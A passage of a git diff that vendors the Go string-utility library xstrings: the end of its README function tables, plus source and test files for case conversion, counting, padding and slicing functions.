Python; `String#swapcase` in Ruby | [#12](https://github.com/huandu/xstrings/issues/12) | +| [ToCamelCase](https://godoc.org/github.com/huandu/xstrings#ToCamelCase) | `String#camelize` in RoR | [#1](https://github.com/huandu/xstrings/issues/1) | +| [ToSnakeCase](https://godoc.org/github.com/huandu/xstrings#ToSnakeCase) | `String#underscore` in RoR | [#1](https://github.com/huandu/xstrings/issues/1) | +| [Translate](https://godoc.org/github.com/huandu/xstrings#Translate) | `str.translate` in Python; 
`String#tr` in Ruby; `strtr` in PHP; `tr///` in Perl | [#21](https://github.com/huandu/xstrings/issues/21) | +| [Width](https://godoc.org/github.com/huandu/xstrings#Width) | `mb_strwidth` in PHP | [#26](https://github.com/huandu/xstrings/issues/26) | +| [WordCount](https://godoc.org/github.com/huandu/xstrings#WordCount) | `str_word_count` in PHP | [#14](https://github.com/huandu/xstrings/issues/14) | +| [WordSplit](https://godoc.org/github.com/huandu/xstrings#WordSplit) | - | [#14](https://github.com/huandu/xstrings/issues/14) | + +### Package `strings` functions ### + +*Keep this table sorted by Function in ascending order.* + +| Function | Friends | +| -------- | ------- | +| [Contains](http://golang.org/pkg/strings/#Contains) | `String#include?` in Ruby | +| [ContainsAny](http://golang.org/pkg/strings/#ContainsAny) | - | +| [ContainsRune](http://golang.org/pkg/strings/#ContainsRune) | - | +| [Count](http://golang.org/pkg/strings/#Count) | `str.count` in Python; `substr_count` in PHP | +| [EqualFold](http://golang.org/pkg/strings/#EqualFold) | `stricmp` in PHP; `String#casecmp` in Ruby | +| [Fields](http://golang.org/pkg/strings/#Fields) | `str.split` in Python; `split` in Perl; `String#split` in Ruby | +| [FieldsFunc](http://golang.org/pkg/strings/#FieldsFunc) | - | +| [HasPrefix](http://golang.org/pkg/strings/#HasPrefix) | `str.startswith` in Python; `String#start_with?` in Ruby | +| [HasSuffix](http://golang.org/pkg/strings/#HasSuffix) | `str.endswith` in Python; `String#end_with?` in Ruby | +| [Index](http://golang.org/pkg/strings/#Index) | `str.index` in Python; `String#index` in Ruby; `strpos` in PHP; `index` in Perl | +| [IndexAny](http://golang.org/pkg/strings/#IndexAny) | - | +| [IndexByte](http://golang.org/pkg/strings/#IndexByte) | - | +| [IndexFunc](http://golang.org/pkg/strings/#IndexFunc) | - | +| [IndexRune](http://golang.org/pkg/strings/#IndexRune) | - | +| [Join](http://golang.org/pkg/strings/#Join) | `str.join` in Python; `Array#join` in Ruby; 
`implode` in PHP; `join` in Perl | +| [LastIndex](http://golang.org/pkg/strings/#LastIndex) | `str.rindex` in Python; `String#rindex`; `strrpos` in PHP; `rindex` in Perl | +| [LastIndexAny](http://golang.org/pkg/strings/#LastIndexAny) | - | +| [LastIndexFunc](http://golang.org/pkg/strings/#LastIndexFunc) | - | +| [Map](http://golang.org/pkg/strings/#Map) | `String#each_codepoint` in Ruby | +| [Repeat](http://golang.org/pkg/strings/#Repeat) | operator `*` in Python and Ruby; `str_repeat` in PHP | +| [Replace](http://golang.org/pkg/strings/#Replace) | `str.replace` in Python; `String#sub` in Ruby; `str_replace` in PHP | +| [Split](http://golang.org/pkg/strings/#Split) | `str.split` in Python; `String#split` in Ruby; `explode` in PHP; `split` in Perl | +| [SplitAfter](http://golang.org/pkg/strings/#SplitAfter) | - | +| [SplitAfterN](http://golang.org/pkg/strings/#SplitAfterN) | - | +| [SplitN](http://golang.org/pkg/strings/#SplitN) | `str.split` in Python; `String#split` in Ruby; `explode` in PHP; `split` in Perl | +| [Title](http://golang.org/pkg/strings/#Title) | `str.title` in Python | +| [ToLower](http://golang.org/pkg/strings/#ToLower) | `str.lower` in Python; `String#downcase` in Ruby; `strtolower` in PHP; `lc` in Perl | +| [ToLowerSpecial](http://golang.org/pkg/strings/#ToLowerSpecial) | - | +| [ToTitle](http://golang.org/pkg/strings/#ToTitle) | - | +| [ToTitleSpecial](http://golang.org/pkg/strings/#ToTitleSpecial) | - | +| [ToUpper](http://golang.org/pkg/strings/#ToUpper) | `str.upper` in Python; `String#upcase` in Ruby; `strtoupper` in PHP; `uc` in Perl | +| [ToUpperSpecial](http://golang.org/pkg/strings/#ToUpperSpecial) | - | +| [Trim](http://golang.org/pkg/strings/#Trim) | `str.strip` in Python; `String#strip` in Ruby; `trim` in PHP | +| [TrimFunc](http://golang.org/pkg/strings/#TrimFunc) | - | +| [TrimLeft](http://golang.org/pkg/strings/#TrimLeft) | `str.lstrip` in Python; `String#lstrip` in Ruby; `ltrim` in PHP | +| 
[TrimLeftFunc](http://golang.org/pkg/strings/#TrimLeftFunc) | - | +| [TrimPrefix](http://golang.org/pkg/strings/#TrimPrefix) | - | +| [TrimRight](http://golang.org/pkg/strings/#TrimRight) | `str.rstrip` in Python; `String#rstrip` in Ruby; `rtrim` in PHP | +| [TrimRightFunc](http://golang.org/pkg/strings/#TrimRightFunc) | - | +| [TrimSpace](http://golang.org/pkg/strings/#TrimSpace) | `str.strip` in Python; `String#strip` in Ruby; `trim` in PHP | +| [TrimSuffix](http://golang.org/pkg/strings/#TrimSuffix) | `String#chomp` in Ruby; `chomp` in Perl | + +## License ## + +This library is licensed under MIT license. See LICENSE for details. diff --git a/vendor/github.com/huandu/xstrings/common.go b/vendor/github.com/huandu/xstrings/common.go new file mode 100644 index 0000000000..2aff57aab4 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/common.go @@ -0,0 +1,25 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" +) + +const bufferMaxInitGrowSize = 2048 + +// Lazy initialize a buffer. +func allocBuffer(orig, cur string) *bytes.Buffer { + output := &bytes.Buffer{} + maxSize := len(orig) * 4 + + // Avoid to reserve too much memory at once. + if maxSize > bufferMaxInitGrowSize { + maxSize = bufferMaxInitGrowSize + } + + output.Grow(maxSize) + output.WriteString(orig[:len(orig)-len(cur)]) + return output +} diff --git a/vendor/github.com/huandu/xstrings/convert.go b/vendor/github.com/huandu/xstrings/convert.go new file mode 100644 index 0000000000..783e73b673 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/convert.go @@ -0,0 +1,364 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "math/rand" + "unicode" + "unicode/utf8" +) + +// ToCamelCase can convert all lower case characters behind underscores +// to upper case character. 
+// Underscore character will be removed in result except following cases. +// * More than 1 underscore. +// "a__b" => "A_B" +// * At the beginning of string. +// "_a" => "_A" +// * At the end of string. +// "ab_" => "Ab_" +func ToCamelCase(str string) string { + if len(str) == 0 { + return "" + } + + buf := &bytes.Buffer{} + var r0, r1 rune + var size int + + // leading '_' will appear in output. + for len(str) > 0 { + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if r0 != '_' { + break + } + + buf.WriteRune(r0) + } + + if len(str) == 0 { + return buf.String() + } + + r0 = unicode.ToUpper(r0) + + for len(str) > 0 { + r1 = r0 + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if r1 == '_' && r0 == '_' { + buf.WriteRune(r1) + continue + } + + if r1 == '_' { + r0 = unicode.ToUpper(r0) + } else { + r0 = unicode.ToLower(r0) + } + + if r1 != '_' { + buf.WriteRune(r1) + } + } + + buf.WriteRune(r0) + return buf.String() +} + +// ToSnakeCase can convert all upper case characters in a string to +// underscore format. +// +// Some samples. +// "FirstName" => "first_name" +// "HTTPServer" => "http_server" +// "NoHTTPS" => "no_https" +// "GO_PATH" => "go_path" +// "GO PATH" => "go_path" // space is converted to underscore. +// "GO-PATH" => "go_path" // hyphen is converted to underscore. +func ToSnakeCase(str string) string { + if len(str) == 0 { + return "" + } + + buf := &bytes.Buffer{} + var prev, r0, r1 rune + var size int + + r0 = '_' + + for len(str) > 0 { + prev = r0 + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + switch { + case r0 == utf8.RuneError: + buf.WriteByte(byte(str[0])) + + case unicode.IsUpper(r0): + if prev != '_' { + buf.WriteRune('_') + } + + buf.WriteRune(unicode.ToLower(r0)) + + if len(str) == 0 { + break + } + + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if !unicode.IsUpper(r0) { + buf.WriteRune(r0) + break + } + + // find next non-upper-case character and insert `_` properly. 
+ // it's designed to convert `HTTPServer` to `http_server`. + // if there are more than 2 adjacent upper case characters in a word, + // treat them as an abbreviation plus a normal word. + for len(str) > 0 { + r1 = r0 + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if r0 == utf8.RuneError { + buf.WriteRune(unicode.ToLower(r1)) + buf.WriteByte(byte(str[0])) + break + } + + if !unicode.IsUpper(r0) { + if r0 == '_' || r0 == ' ' || r0 == '-' { + r0 = '_' + + buf.WriteRune(unicode.ToLower(r1)) + } else { + buf.WriteRune('_') + buf.WriteRune(unicode.ToLower(r1)) + buf.WriteRune(r0) + } + + break + } + + buf.WriteRune(unicode.ToLower(r1)) + } + + if len(str) == 0 || r0 == '_' { + buf.WriteRune(unicode.ToLower(r0)) + break + } + + default: + if r0 == ' ' || r0 == '-' { + r0 = '_' + } + + buf.WriteRune(r0) + } + } + + return buf.String() +} + +// SwapCase will swap characters case from upper to lower or lower to upper. +func SwapCase(str string) string { + var r rune + var size int + + buf := &bytes.Buffer{} + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + switch { + case unicode.IsUpper(r): + buf.WriteRune(unicode.ToLower(r)) + + case unicode.IsLower(r): + buf.WriteRune(unicode.ToUpper(r)) + + default: + buf.WriteRune(r) + } + + str = str[size:] + } + + return buf.String() +} + +// FirstRuneToUpper converts first rune to upper case if necessary. +func FirstRuneToUpper(str string) string { + if str == "" { + return str + } + + r, size := utf8.DecodeRuneInString(str) + + if !unicode.IsLower(r) { + return str + } + + buf := &bytes.Buffer{} + buf.WriteRune(unicode.ToUpper(r)) + buf.WriteString(str[size:]) + return buf.String() +} + +// FirstRuneToLower converts first rune to lower case if necessary. 
+func FirstRuneToLower(str string) string { + if str == "" { + return str + } + + r, size := utf8.DecodeRuneInString(str) + + if !unicode.IsUpper(r) { + return str + } + + buf := &bytes.Buffer{} + buf.WriteRune(unicode.ToLower(r)) + buf.WriteString(str[size:]) + return buf.String() +} + +// Shuffle randomizes runes in a string and returns the result. +// It uses default random source in `math/rand`. +func Shuffle(str string) string { + if str == "" { + return str + } + + runes := []rune(str) + index := 0 + + for i := len(runes) - 1; i > 0; i-- { + index = rand.Intn(i + 1) + + if i != index { + runes[i], runes[index] = runes[index], runes[i] + } + } + + return string(runes) +} + +// ShuffleSource randomizes runes in a string with given random source. +func ShuffleSource(str string, src rand.Source) string { + if str == "" { + return str + } + + runes := []rune(str) + index := 0 + r := rand.New(src) + + for i := len(runes) - 1; i > 0; i-- { + index = r.Intn(i + 1) + + if i != index { + runes[i], runes[index] = runes[index], runes[i] + } + } + + return string(runes) +} + +// Successor returns the successor to string. +// +// If there is one alphanumeric rune is found in string, increase the rune by 1. +// If increment generates a "carry", the rune to the left of it is incremented. +// This process repeats until there is no carry, adding an additional rune if necessary. +// +// If there is no alphanumeric rune, the rightmost rune will be increased by 1 +// regardless whether the result is a valid rune or not. +// +// Only following characters are alphanumeric. 
+// * a - z +// * A - Z +// * 0 - 9 +// +// Samples (borrowed from ruby's String#succ document): +// "abcd" => "abce" +// "THX1138" => "THX1139" +// "<>" => "<>" +// "1999zzz" => "2000aaa" +// "ZZZ9999" => "AAAA0000" +// "***" => "**+" +func Successor(str string) string { + if str == "" { + return str + } + + var r rune + var i int + carry := ' ' + runes := []rune(str) + l := len(runes) + lastAlphanumeric := l + + for i = l - 1; i >= 0; i-- { + r = runes[i] + + if ('a' <= r && r <= 'y') || + ('A' <= r && r <= 'Y') || + ('0' <= r && r <= '8') { + runes[i]++ + carry = ' ' + lastAlphanumeric = i + break + } + + switch r { + case 'z': + runes[i] = 'a' + carry = 'a' + lastAlphanumeric = i + + case 'Z': + runes[i] = 'A' + carry = 'A' + lastAlphanumeric = i + + case '9': + runes[i] = '0' + carry = '0' + lastAlphanumeric = i + } + } + + // Needs to add one character for carry. + if i < 0 && carry != ' ' { + buf := &bytes.Buffer{} + buf.Grow(l + 4) // Reserve enough space for write. + + if lastAlphanumeric != 0 { + buf.WriteString(str[:lastAlphanumeric]) + } + + buf.WriteRune(carry) + + for _, r = range runes[lastAlphanumeric:] { + buf.WriteRune(r) + } + + return buf.String() + } + + // No alphanumeric character. Simply increase last rune's value. + if lastAlphanumeric == l { + runes[l-1]++ + } + + return string(runes) +} diff --git a/vendor/github.com/huandu/xstrings/convert_test.go b/vendor/github.com/huandu/xstrings/convert_test.go new file mode 100644 index 0000000000..30707a98a8 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/convert_test.go @@ -0,0 +1,165 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. 
+ +package xstrings + +import ( + "sort" + "strings" + "testing" +) + +func TestToSnakeCase(t *testing.T) { + runTestCases(t, ToSnakeCase, _M{ + "HTTPServer": "http_server", + "_camelCase": "_camel_case", + "NoHTTPS": "no_https", + "Wi_thF": "wi_th_f", + "_AnotherTES_TCaseP": "_another_tes_t_case_p", + "ALL": "all", + "_HELLO_WORLD_": "_hello_world_", + "HELLO_WORLD": "hello_world", + "HELLO____WORLD": "hello____world", + "TW": "tw", + "_C": "_c", + + " sentence case ": "__sentence_case__", + " Mixed-hyphen case _and SENTENCE_case and UPPER-case": "_mixed_hyphen_case__and_sentence_case_and_upper_case", + }) +} + +func TestToCamelCase(t *testing.T) { + runTestCases(t, ToCamelCase, _M{ + "http_server": "HttpServer", + "_camel_case": "_CamelCase", + "no_https": "NoHttps", + "_complex__case_": "_Complex_Case_", + "all": "All", + "GOLANG_IS_GREAT": "GolangIsGreat", + "GOLANG": "Golang", + }) +} + +func TestSwapCase(t *testing.T) { + runTestCases(t, SwapCase, _M{ + "swapCase": "SWAPcASE", + "Θ~λa云Ξπ": "θ~ΛA云ξΠ", + }) +} + +func TestFirstRuneToUpper(t *testing.T) { + runTestCases(t, FirstRuneToUpper, _M{ + "hello, world!": "Hello, world!", + "Hello, world!": "Hello, world!", + "你好,世界!": "你好,世界!", + }) +} + +func TestFirstRuneToLower(t *testing.T) { + runTestCases(t, FirstRuneToLower, _M{ + "hello, world!": "hello, world!", + "Hello, world!": "hello, world!", + "你好,世界!": "你好,世界!", + }) +} + +func TestShuffle(t *testing.T) { + // It seems there is no reliable way to test shuffled string. + // Runner just make sure shuffled string has the same runes as origin string. + runner := func(str string) string { + s := Shuffle(str) + slice := sort.StringSlice(strings.Split(s, "")) + slice.Sort() + return strings.Join(slice, "") + } + + runTestCases(t, runner, _M{ + "": "", + "facgbheidjk": "abcdefghijk", + "尝试中文": "中尝文试", + "zh英文hun排": "hhnuz排文英", + }) +} + +type testShuffleSource int + +// A generated random number sequance just for testing. 
+var testShuffleTable = []int64{ + 1874068156324778273, + 3328451335138149956, + 5263531936693774911, + 7955079406183515637, + 2703501726821866378, + 2740103009342231109, + 6941261091797652072, + 1905388747193831650, + 7981306761429961588, + 6426100070888298971, + 4831389563158288344, + 261049867304784443, + 1460320609597786623, + 5600924393587988459, + 8995016276575641803, + 732830328053361739, + 5486140987150761883, + 545291762129038907, + 6382800227808658932, + 2781055864473387780, + 1598098976185383115, + 4990765271833742716, + 5018949295715050020, + 2568779411109623071, + 3902890183311134652, + 4893789450120281907, + 2338498362660772719, + 2601737961087659062, + 7273596521315663110, + 3337066551442961397, + 8121576815539813105, + 2740376916591569721, + 8249030965139585917, + 898860202204764712, + 9010467728050264449, + 685213522303989579, + 2050257992909156333, + 6281838661429879825, + 2227583514184312746, + 2873287401706343734, +} + +func (src testShuffleSource) Int63() int64 { + n := testShuffleTable[int(src)%len(testShuffleTable)] + src++ + return n +} + +func (src testShuffleSource) Seed(int64) {} + +func TestShuffleSource(t *testing.T) { + var src testShuffleSource + runner := func(str string) string { + return ShuffleSource(str, src) + } + + runTestCases(t, runner, _M{ + "": "", + "facgbheidjk": "bakefjgichd", + "尝试中文怎么样": "怎试中样尝么文", + "zh英文hun排": "hh英nzu文排", + }) +} + +func TestSuccessor(t *testing.T) { + runTestCases(t, Successor, _M{ + "": "", + "abcd": "abce", + "THX1138": "THX1139", + "<>": "<>", + "1999zzz": "2000aaa", + "ZZZ9999": "AAAA0000", + "***": "**+", + + "来点中文试试": "来点中文试诖", + "中cZ英ZZ文zZ混9zZ9杂99进z位": "中dA英AA文aA混0aA0杂00进a位", + }) +} diff --git a/vendor/github.com/huandu/xstrings/count.go b/vendor/github.com/huandu/xstrings/count.go new file mode 100644 index 0000000000..f96e38703a --- /dev/null +++ b/vendor/github.com/huandu/xstrings/count.go @@ -0,0 +1,120 @@ +// Copyright 2015 Huan Du. All rights reserved. 
+// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "unicode" + "unicode/utf8" +) + +// Len returns str's utf8 rune length. +func Len(str string) int { + return utf8.RuneCountInString(str) +} + +// WordCount returns number of words in a string. +// +// Word is defined as a locale dependent string containing alphabetic characters, +// which may also contain but not start with `'` and `-` characters. +func WordCount(str string) int { + var r rune + var size, n int + + inWord := false + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + switch { + case isAlphabet(r): + if !inWord { + inWord = true + n++ + } + + case inWord && (r == '\'' || r == '-'): + // Still in word. + + default: + inWord = false + } + + str = str[size:] + } + + return n +} + +const minCJKCharacter = '\u3400' + +// Checks r is a letter but not CJK character. +func isAlphabet(r rune) bool { + if !unicode.IsLetter(r) { + return false + } + + switch { + // Quick check for non-CJK character. + case r < minCJKCharacter: + return true + + // Common CJK characters. + case r >= '\u4E00' && r <= '\u9FCC': + return false + + // Rare CJK characters. + case r >= '\u3400' && r <= '\u4D85': + return false + + // Rare and historic CJK characters. + case r >= '\U00020000' && r <= '\U0002B81D': + return false + } + + return true +} + +// Width returns string width in monotype font. +// Multi-byte characters are usually twice the width of single byte characters. +// +// Algorithm comes from `mb_strwidth` in PHP. +// http://php.net/manual/en/function.mb-strwidth.php +func Width(str string) int { + var r rune + var size, n int + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + n += RuneWidth(r) + str = str[size:] + } + + return n +} + +// RuneWidth returns character width in monotype font. +// Multi-byte characters are usually twice the width of single byte characters. +// +// Algorithm comes from `mb_strwidth` in PHP. 
+// http://php.net/manual/en/function.mb-strwidth.php +func RuneWidth(r rune) int { + switch { + case r == utf8.RuneError || r < '\x20': + return 0 + + case '\x20' <= r && r < '\u2000': + return 1 + + case '\u2000' <= r && r < '\uFF61': + return 2 + + case '\uFF61' <= r && r < '\uFFA0': + return 1 + + case '\uFFA0' <= r: + return 2 + } + + return 0 +} diff --git a/vendor/github.com/huandu/xstrings/count_test.go b/vendor/github.com/huandu/xstrings/count_test.go new file mode 100644 index 0000000000..0500b145fb --- /dev/null +++ b/vendor/github.com/huandu/xstrings/count_test.go @@ -0,0 +1,62 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "fmt" + "testing" +) + +func TestLen(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(Len(str)) + } + + runTestCases(t, runner, _M{ + "abcdef": "6", + "中文": "2", + "中yin文hun排": "9", + "": "0", + }) +} + +func TestWordCount(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(WordCount(str)) + } + + runTestCases(t, runner, _M{ + "one word: λ": "3", + "中文": "0", + "你好,sekai!": "1", + "oh, it's super-fancy!!a": "4", + "": "0", + "-": "0", + "it's-'s": "1", + }) +} + +func TestWidth(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(Width(str)) + } + + runTestCases(t, runner, _M{ + "abcd\t0123\n7890": "12", + "中zh英eng文混排": "15", + "": "0", + }) +} + +func TestRuneWidth(t *testing.T) { + runner := func(str string) string { + return fmt.Sprint(RuneWidth([]rune(str)[0])) + } + + runTestCases(t, runner, _M{ + "a": "1", + "中": "2", + "\x11": "0", + }) +} diff --git a/vendor/github.com/huandu/xstrings/doc.go b/vendor/github.com/huandu/xstrings/doc.go new file mode 100644 index 0000000000..1a6ef069f6 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/doc.go @@ -0,0 +1,8 @@ +// Copyright 2015 Huan Du. All rights reserved. 
+// Licensed under the MIT license that can be found in the LICENSE file. + +// Package xstrings is to provide string algorithms which are useful but not included in `strings` package. +// See project home page for details. https://github.com/huandu/xstrings +// +// Package xstrings assumes all strings are encoded in utf8. +package xstrings diff --git a/vendor/github.com/huandu/xstrings/format.go b/vendor/github.com/huandu/xstrings/format.go new file mode 100644 index 0000000000..2d02df1c04 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/format.go @@ -0,0 +1,170 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "unicode/utf8" +) + +// ExpandTabs can expand tabs ('\t') rune in str to one or more spaces dpending on +// current column and tabSize. +// The column number is reset to zero after each newline ('\n') occurring in the str. +// +// ExpandTabs uses RuneWidth to decide rune's width. +// For example, CJK characters will be treated as two characters. +// +// If tabSize <= 0, ExpandTabs panics with error. 
+// +// Samples: +// ExpandTabs("a\tbc\tdef\tghij\tk", 4) => "a bc def ghij k" +// ExpandTabs("abcdefg\thij\nk\tl", 4) => "abcdefg hij\nk l" +// ExpandTabs("z中\t文\tw", 4) => "z中 文 w" +func ExpandTabs(str string, tabSize int) string { + if tabSize <= 0 { + panic("tab size must be positive") + } + + var r rune + var i, size, column, expand int + var output *bytes.Buffer + + orig := str + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + if r == '\t' { + expand = tabSize - column%tabSize + + if output == nil { + output = allocBuffer(orig, str) + } + + for i = 0; i < expand; i++ { + output.WriteByte(byte(' ')) + } + + column += expand + } else { + if r == '\n' { + column = 0 + } else { + column += RuneWidth(r) + } + + if output != nil { + output.WriteRune(r) + } + } + + str = str[size:] + } + + if output == nil { + return orig + } + + return output.String() +} + +// LeftJustify returns a string with pad string at right side if str's rune length is smaller than length. +// If str's rune length is larger than length, str itself will be returned. +// +// If pad is an empty string, str will be returned. +// +// Samples: +// LeftJustify("hello", 4, " ") => "hello" +// LeftJustify("hello", 10, " ") => "hello " +// LeftJustify("hello", 10, "123") => "hello12312" +func LeftJustify(str string, length int, pad string) string { + l := Len(str) + + if l >= length || pad == "" { + return str + } + + remains := length - l + padLen := Len(pad) + + output := &bytes.Buffer{} + output.Grow(len(str) + (remains/padLen+1)*len(pad)) + output.WriteString(str) + writePadString(output, pad, padLen, remains) + return output.String() +} + +// RightJustify returns a string with pad string at left side if str's rune length is smaller than length. +// If str's rune length is larger than length, str itself will be returned. +// +// If pad is an empty string, str will be returned. 
+// +// Samples: +// RightJustify("hello", 4, " ") => "hello" +// RightJustify("hello", 10, " ") => " hello" +// RightJustify("hello", 10, "123") => "12312hello" +func RightJustify(str string, length int, pad string) string { + l := Len(str) + + if l >= length || pad == "" { + return str + } + + remains := length - l + padLen := Len(pad) + + output := &bytes.Buffer{} + output.Grow(len(str) + (remains/padLen+1)*len(pad)) + writePadString(output, pad, padLen, remains) + output.WriteString(str) + return output.String() +} + +// Center returns a string with pad string at both side if str's rune length is smaller than length. +// If str's rune length is larger than length, str itself will be returned. +// +// If pad is an empty string, str will be returned. +// +// Samples: +// Center("hello", 4, " ") => "hello" +// Center("hello", 10, " ") => " hello " +// Center("hello", 10, "123") => "12hello123" +func Center(str string, length int, pad string) string { + l := Len(str) + + if l >= length || pad == "" { + return str + } + + remains := length - l + padLen := Len(pad) + + output := &bytes.Buffer{} + output.Grow(len(str) + (remains/padLen+1)*len(pad)) + writePadString(output, pad, padLen, remains/2) + output.WriteString(str) + writePadString(output, pad, padLen, (remains+1)/2) + return output.String() +} + +func writePadString(output *bytes.Buffer, pad string, padLen, remains int) { + var r rune + var size int + + repeats := remains / padLen + + for i := 0; i < repeats; i++ { + output.WriteString(pad) + } + + remains = remains % padLen + + if remains != 0 { + for i := 0; i < remains; i++ { + r, size = utf8.DecodeRuneInString(pad) + output.WriteRune(r) + pad = pad[size:] + } + } +} diff --git a/vendor/github.com/huandu/xstrings/format_test.go b/vendor/github.com/huandu/xstrings/format_test.go new file mode 100644 index 0000000000..54102110ad --- /dev/null +++ b/vendor/github.com/huandu/xstrings/format_test.go @@ -0,0 +1,100 @@ +// Copyright 2015 Huan Du. 
All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "strconv" + "strings" + "testing" +) + +func TestExpandTabs(t *testing.T) { + runner := func(str string) (result string) { + defer func() { + if e := recover(); e != nil { + result = e.(string) + } + }() + + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return ExpandTabs(input[0], n) + } + + runTestCases(t, runner, _M{ + sep("a\tbc\tdef\tghij\tk", "4"): "a bc def ghij k", + sep("abcdefg\thij\nk\tl", "4"): "abcdefg hij\nk l", + sep("z中\t文\tw", "4"): "z中 文 w", + sep("abcdef", "4"): "abcdef", + + sep("abc\td\tef\tghij\nk\tl", "3"): "abc d ef ghij\nk l", + sep("abc\td\tef\tghij\nk\tl", "1"): "abc d ef ghij\nk l", + + sep("abc", "0"): "tab size must be positive", + sep("abc", "-1"): "tab size must be positive", + }) +} + +func TestLeftJustify(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return LeftJustify(input[0], n, input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "4", " "): "hello", + sep("hello", "10", " "): "hello ", + sep("hello", "10", "123"): "hello12312", + + sep("hello中文test", "4", " "): "hello中文test", + sep("hello中文test", "12", " "): "hello中文test ", + sep("hello中文test", "18", "测试!"): "hello中文test测试!测试!测", + + sep("hello中文test", "0", "123"): "hello中文test", + sep("hello中文test", "18", ""): "hello中文test", + }) +} + +func TestRightJustify(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return RightJustify(input[0], n, input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "4", " "): "hello", + sep("hello", "10", " "): " hello", + sep("hello", "10", "123"): "12312hello", + + sep("hello中文test", "4", " "): "hello中文test", + sep("hello中文test", "12", " "): " hello中文test", + sep("hello中文test", "18", "测试!"): "测试!测试!测hello中文test", + + 
sep("hello中文test", "0", "123"): "hello中文test", + sep("hello中文test", "18", ""): "hello中文test", + }) +} + +func TestCenter(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + n, _ := strconv.Atoi(input[1]) + return Center(input[0], n, input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "4", " "): "hello", + sep("hello", "10", " "): " hello ", + sep("hello", "10", "123"): "12hello123", + + sep("hello中文test", "4", " "): "hello中文test", + sep("hello中文test", "12", " "): "hello中文test ", + sep("hello中文test", "18", "测试!"): "测试!hello中文test测试!测", + + sep("hello中文test", "0", "123"): "hello中文test", + sep("hello中文test", "18", ""): "hello中文test", + }) +} diff --git a/vendor/github.com/huandu/xstrings/manipulate.go b/vendor/github.com/huandu/xstrings/manipulate.go new file mode 100644 index 0000000000..0eefb43ed7 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/manipulate.go @@ -0,0 +1,217 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "strings" + "unicode/utf8" +) + +// Reverse a utf8 encoded string. +func Reverse(str string) string { + var size int + + tail := len(str) + buf := make([]byte, tail) + s := buf + + for len(str) > 0 { + _, size = utf8.DecodeRuneInString(str) + tail -= size + s = append(s[:tail], []byte(str[:size])...) + str = str[size:] + } + + return string(buf) +} + +// Slice a string by rune. +// +// Start must satisfy 0 <= start <= rune length. +// +// End can be positive, zero or negative. +// If end >= 0, start and end must satisfy start <= end <= rune length. +// If end < 0, it means slice to the end of string. +// +// Otherwise, Slice will panic as out of range. 
+func Slice(str string, start, end int) string { + var size, startPos, endPos int + + origin := str + + if start < 0 || end > len(str) || (end >= 0 && start > end) { + panic("out of range") + } + + if end >= 0 { + end -= start + } + + for start > 0 && len(str) > 0 { + _, size = utf8.DecodeRuneInString(str) + start-- + startPos += size + str = str[size:] + } + + if end < 0 { + return origin[startPos:] + } + + endPos = startPos + + for end > 0 && len(str) > 0 { + _, size = utf8.DecodeRuneInString(str) + end-- + endPos += size + str = str[size:] + } + + if len(str) == 0 && (start > 0 || end > 0) { + panic("out of range") + } + + return origin[startPos:endPos] +} + +// Partition splits a string by sep into three parts. +// The return value is a slice of strings with head, match and tail. +// +// If str contains sep, for example "hello" and "l", Partition returns +// "he", "l", "lo" +// +// If str doesn't contain sep, for example "hello" and "x", Partition returns +// "hello", "", "" +func Partition(str, sep string) (head, match, tail string) { + index := strings.Index(str, sep) + + if index == -1 { + head = str + return + } + + head = str[:index] + match = str[index : index+len(sep)] + tail = str[index+len(sep):] + return +} + +// LastPartition splits a string by last instance of sep into three parts. +// The return value is a slice of strings with head, match and tail. +// +// If str contains sep, for example "hello" and "l", LastPartition returns +// "hel", "l", "o" +// +// If str doesn't contain sep, for example "hello" and "x", LastPartition returns +// "", "", "hello" +func LastPartition(str, sep string) (head, match, tail string) { + index := strings.LastIndex(str, sep) + + if index == -1 { + tail = str + return + } + + head = str[:index] + match = str[index : index+len(sep)] + tail = str[index+len(sep):] + return +} + +// Insert src into dst at given rune index. +// Index is counted by runes instead of bytes. 
